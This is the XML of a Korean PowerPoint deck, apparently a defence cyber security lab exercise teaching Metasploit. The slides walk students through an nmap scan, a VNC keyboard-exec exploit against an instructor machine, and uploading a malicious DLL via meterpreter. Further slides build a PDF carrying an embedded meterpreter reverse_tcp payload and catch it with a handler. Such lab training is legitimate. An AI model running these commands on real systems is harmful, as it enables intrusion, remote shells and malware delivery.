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78" r:id="rId3"/>
    <p:sldId id="363" r:id="rId4"/>
    <p:sldId id="364" r:id="rId5"/>
    <p:sldId id="675" r:id="rId6"/>
    <p:sldId id="676" r:id="rId7"/>
    <p:sldId id="683" r:id="rId8"/>
    <p:sldId id="677" r:id="rId9"/>
    <p:sldId id="679" r:id="rId10"/>
    <p:sldId id="6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02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29A5-72C3-110A-9544-1546BA74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metasploit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86C94-195F-1237-E39A-F507EC74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Demilight"/>
              </a:rPr>
              <a:t>CVE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Demilight"/>
              </a:rPr>
              <a:t>넘버링이 붙은 알려진 취약점 공격을 사용할 수 있도록 제공되는  모의 해킹 테스트 도구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Demilight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty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Demilight"/>
              </a:rPr>
              <a:t>CVE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Demilight"/>
              </a:rPr>
              <a:t>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Demilight"/>
              </a:rPr>
              <a:t>? Common Vulnerabilities and Exposure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Demilight"/>
              </a:rPr>
              <a:t>약자로 공개적으로 알려진 소프트웨어 보안 취약점을 가리키는 고유 표기이다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33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/Training/Unit/Mal/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(VNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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4" y="4337065"/>
            <a:ext cx="4432683" cy="15285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 기반의 터미널 서비스와 유사한 기능의 프로그램이다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VNC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취약점을 사용하여 교관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화면과 정보를 갈취하고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위치에 악성파일의 이름을 변경하여 업로드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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>* 침투도구 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msfconsole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	* C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>칼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP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5" y="433706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38" y="2157804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10150" y="2085717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25759" y="2090875"/>
            <a:ext cx="4432682" cy="411398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*악성파일 위치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#/root/Desktop/attackcode/mall.dll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nmap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포트가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열려있는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nmap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-T4 -O -p 5900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대역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]/24 --open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라우터 주소 찾기 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#http://192.168.1.20/ip.php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활용법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msfconsole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# use exploit/multi/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vnc_keyboard_exec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# set RHOST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# set LHOST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# exploit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*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업로드 위치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C:\\temp\\malware\\vnc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취약점을 이용한 악성코드 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580445" y="3132707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711573" y="3240850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1496054" y="3147326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Windows(2012)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6" y="4470317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공격대상 단말기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 포트를 탐지한다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#nmap -T4 -O -p 5900 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>대역</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]/24 –open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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 버그를 수정한다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>메타스플로잇의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 리눅스 버전과 다른 인증서가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>깔려있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정이 필요합니다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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cd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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-framework/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/core/payload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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dalvik.rb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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>VNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 공격을 실시한다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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행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#msfconsole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A51B7F-8DA6-0B2A-55A7-AD5272511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47512"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="452681" y="1725077"/>
          <a:ext cx="5495671" cy="935228"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1058545">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3218554723"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1108456">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289815135"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1108456">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="710504517"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1108456">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2985330432"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1111758">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2393707431"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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학생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PC vm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KNH-AttackKali-X-01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KNH-AttackKali-X-02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KNH-AttackKali-X-03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KNH-AttackKali-X-04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86746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192.168.41.0/24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192.168.81.0/24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6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192.168.121.0/24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6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192.168.161.0/24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02198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BCD1841E-B5B5-8372-EEAF-674FFFB8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81" y="30158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0351632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182074AD-1FCB-F1F6-C6B3-5DB9F10B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44" y="1094948"/>
            <a:ext cx="5400675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DD9694-530B-2927-2B9B-1220D9DCA533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452681" y="4124772"/>
            <a:ext cx="512692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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>cert.not_after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cert.not_before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> + 3600 * 24 * 365 * 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>cert.not_after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cert.not_before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> + 3600 * 24 * 365 * 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48C9B9-3BF2-BBBE-8B30-0B4062F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81" y="866899"/>
            <a:ext cx="5532946" cy="7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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 공격 선택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use exploit/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vnc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vnc_keyboard_exec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피해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 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set RHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>피해 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP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#exploit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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 서버 라우터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>찾기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#http://192.168.1.20/ip.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이동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공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정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set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라우터 아이피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exploit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*show options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accent1"/>
                </a:solidFill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</a:rPr>
              <a:t>교관화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]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4D67198F-FFD1-3842-C584-4357A3E1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86619872">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FE99C-D3DC-908D-8BDF-6DA9F025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" y="914400"/>
            <a:ext cx="475456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6B5ABDF2-BF33-FC6B-12AF-C1BDB354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932425616">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E757B851-4337-6363-C2CB-81BA6E1F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6" y="2245960"/>
            <a:ext cx="540067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62DD4071-8FCB-198D-FD57-9F54C67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686662064">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC40129-E96D-E36B-FB38-42660563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" y="3485408"/>
            <a:ext cx="5364163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970AEC-44D8-740C-4221-3F5F93C2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CAD0B8-B092-5A32-AF45-F4E52906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60BCC74-2822-5B2A-C3D0-23677A08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1" name="_x121746160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7F3961-66ED-86EF-DB76-86E6E700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3736335"/>
            <a:ext cx="5400675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18BEDD-67DE-5BFB-789D-CBFCA517F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53" y="5248894"/>
            <a:ext cx="5396349" cy="9861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6B0D5ED-CFBF-83B8-B595-0A3F7D23A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268" y="622940"/>
            <a:ext cx="5380553" cy="26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#cd /root/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 이동 후 스크린 샷 확인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#cd /root/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 이동 후 스크린 샷 확인 가능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#sysinfo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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>악성파일 업로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="14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    *새로운 터미널을 실행한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#cp /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>attackcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/malldll.dll [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>na</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 번호 이름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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>점수 체크 용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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Ex) cp /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>attackcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/malldll.dll 1.dll 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52957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 err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 중인 터미널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#upload /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>attackcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/1.dll C:\\temp\\malware\\vnc\\(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제출 파일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 -&gt;C:\\temp\\malware\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>아래 업로드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교관화면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220B52-16DA-81F1-0AD2-A39098F1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37817752">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A96ECC-D4E7-32BD-9224-4DF93DC8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2561"/>
            <a:ext cx="5249863" cy="24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4D617480-81A6-754E-A8E2-1028FF32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932290344">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF76BC1-7CD2-A524-5FE1-1E4694B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880156"/>
            <a:ext cx="4694238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F6B9562-782B-A23D-8AD7-68018FF8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21728912">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09C1A44-CD89-D387-5357-78046D1D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15" y="468285"/>
            <a:ext cx="5400675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EE33E318-D98E-B171-3C26-9E460C7B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246139392">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{981E541E-42A9-2F96-BAE2-08D51A62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1906559"/>
            <a:ext cx="540067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39D39-1853-5EB2-33FE-64C2E433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1" name="_x246139104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109D0658-4523-F098-9B83-51FE5287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14" y="2571694"/>
            <a:ext cx="540067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9779C-050A-23ED-95C6-F622D275B56E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5027529"/>
            <a:ext cx="5616792" cy="1460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2DB14-A4B1-C702-5E74-BCB69524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3" name="_x246141552">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36FB0BBE-6EFE-F6BB-ECCF-A9648B25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4" y="5312081"/>
            <a:ext cx="540067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4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/Training/Unit/Mal/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(PDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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4" y="4337065"/>
            <a:ext cx="4432683" cy="15285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메타스플로잇을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adobe_player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취약점을 이용하여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제작하고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취약점을 이용하여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악성파일을 제출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*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제작도구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msfconsole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* C&amp;C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5" y="433706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38" y="2157804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10150" y="2085717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25759" y="2090875"/>
            <a:ext cx="4432682" cy="377469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* PDF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위치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/root/Desktop/smart.pdf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msfconsole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제작 순서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 exploit/windows/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fileformat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adobe_pdf_embedded_exe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set payload windows/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meterpreter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reverse_tcp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set options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exploit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*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라우터 주소 찾기 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http://192.168.1.20/ip.php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*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바탕화면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/malware/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제출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(pdf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취약점이용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공격방법을 이해할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580445" y="3132707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711573" y="3240850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1496054" y="3147326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Windows(2012)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6" y="4470317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47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 err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인 법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192.168.1.20/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ip.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력하면 라우터 아이피가 나온다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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>터미널에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 후 아래 스크린 샷 순서대로 명령어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msfconsole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use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fileformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>adobe_pdf_embedded_exe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set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter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reverse_tcp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51596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# set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라우터 아이피</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>칼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP)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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>infilename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> /root/Desktop/smart.pdf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exploit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428FC9F-C5A1-47AB-B35A-DA56503D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21751456">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F322E1-1ED6-E949-9A70-01AF560D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" y="878774"/>
            <a:ext cx="5364163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9DE8EB42-746F-8F01-F545-0EA3854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933346744">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1DE5290-811E-66B4-B7BA-E591D47E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" y="2808514"/>
            <a:ext cx="54006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C9DFB4B1-144E-40F9-CA7F-74F6A1E9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2CDEDE-1EFA-5F44-9924-4C04997FD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812" y="1125355"/>
            <a:ext cx="5373344" cy="3540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1F1A91-5B7D-959D-EC07-1B5E9F9C6370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5027529"/>
            <a:ext cx="5616792" cy="1460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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="_x246141552">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340DE6B3-12A1-E96C-7EEE-FB0B9404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4" y="5312081"/>
            <a:ext cx="540067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교관 악성 코드 확인 방법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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>학생</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>pc&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 실행한 뒤 원격 연결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use exploit/multi/handler  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>핸들러를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 이용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set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter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reverse_tcp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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라우터 아이피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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 4444 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exploit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E6E2153-4DF6-49BD-509C-07EA51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81304008">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48F13B71-E4BB-F59E-CD00-B2DB10AC4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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="1034587"/>
            <a:ext cx="5400675" cy="13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44A87D6-B49F-6D27-0031-9EB66BF6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80" y="39315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931135192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB90E27-3E54-D4DA-35FC-BBE07EAD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9" y="3631869"/>
            <a:ext cx="54006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9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931</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린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Demilight</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>한컴바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>국방 사이버 보안</vt:lpstr>
      <vt:lpstr>metasploit</vt:lpstr>
      <vt:lpstr>/Training/Unit/Mal/1  1.악성코드 공격 (VNC 취약점)</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Mal/1  2.악성코드 공격 (PDF 취약점)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Author</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-20T11:27:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-25T19:43:25Z</dcterms:modified>
</cp:coreProperties>
</file>